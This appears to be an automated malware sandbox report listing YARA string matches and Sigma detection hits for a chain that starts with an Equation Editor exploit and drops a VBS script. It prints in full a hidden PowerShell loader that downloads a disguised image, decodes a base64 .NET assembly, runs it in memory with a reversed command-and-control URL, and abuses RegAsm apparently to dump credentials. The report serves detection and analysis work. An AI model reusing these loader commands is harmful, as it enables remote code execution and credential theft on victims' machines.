    • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x64b7c:$str_b2: Executing file:
    • 0x65bfc:$str_b3: GetDirectListeningPort
    • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x65728:$str_b7: \update.vbs
    • 0x64ba4:$str_b9: Downloaded file:
    • 0x64b90:$str_b10: Downloading file:
    • 0x64c34:$str_b12: Failed to upload file:
    • 0x65bc4:$str_b13: StartForward
    • 0x65be4:$str_b14: StopForward
    • 0x65680:$str_b15: fso.DeleteFile "
    • 0x65614:$str_b16: On Error Resume Next
    • 0x656b0:$str_b17: fso.DeleteFolder "
    • 0x64c24:$str_b18: Uploaded file:
    • 0x64be4:$str_b19: Unable to delete:
    • 0x65648:$str_b20: while fso.FileExists("
    • 0x650c1:$str_c0: [Firefox StoredLogins not found]

                  Exploits

Source: Network Connection; Author: Joe Security; Data: DestinationIp: 85.239.241.184, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3616, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3616, TargetFilename: C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS

                  System Summary

                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? 
?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ?
Source: Network Connection; Author: Max Altgelt (Nextron Systems); Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3616, Protocol: tcp, SourceIp: 85.239.241.184, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = 
[System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? 
?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ?
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3616, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , ProcessId: 3756, ProcessName: wscript.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3616, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , ProcessId: 3756, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? 
? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ?
                  Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 4008, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp", ProcessId: 3184, ProcessName: RegAsm.exe
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = 
$loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? 